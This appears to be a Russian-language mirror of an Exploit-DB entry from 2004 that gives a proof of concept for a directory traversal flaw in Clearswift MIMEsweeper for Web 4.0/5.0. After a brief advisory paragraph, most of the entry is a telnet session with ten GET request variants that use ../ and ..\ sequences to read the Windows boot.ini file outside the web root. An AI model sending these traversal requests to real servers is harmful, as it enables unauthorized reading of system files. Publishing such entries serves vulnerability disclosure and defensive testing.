- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 24363
- Проверка EDB
-
- Пройдено
- Автор
- KROMA PIERRE
- Тип уязвимости
- REMOTE
- Платформа
- WINDOWS
- CVE
- N/A
- Дата публикации
- 2004-07-11
clearswift MIMEsweeper for Web 4.0/5.0 - Directory Traversal
Код:
source: https://www.securityfocus.com/bid/10918/info
Clearswift MIMEsweeper For Web is reported prone to a directory traversal vulnerability due to insufficient sanitization of user-supplied data.
To carry out an attack an attacker may specify a relative path to a target file in a GET request to the vulnerable server, directory traversal character sequences may be supplied as a part of the request to escape the web root.
telnet www.example.com 80
Trying www.example.com...
Connected to www.example.com.
Escape character is '^]'.
GET /ca/..\\..\\..\\..\\..\\..\\boot.ini HTTP/1.0
GET /foobar/..\\..\\..\\..\\boot.ini HTTP/1.0
GET /foobar/..\..\..\..\..\..\\boot.ini HTTP/1.0
GET /foobar/..\..\..\..\..\..\boot.ini HTTP/1.0
GET /foobar/\..\..\..\..\..\boot.ini HTTP/1.0
GET /foobar//..\\..\\..\\..\\boot.ini HTTP/1.0
GET /foobar//..\\..//..\\..//boot.ini HTTP/1.0
GET /foobar/\../\../\../\../\boot.ini HTTP/1.0
GET /foobar/../../../../boot.ini HTTP/1.0
GET /foobar\..\..\..\..\boot.ini HTTP/1.0- Источник
- www.exploit-db.com
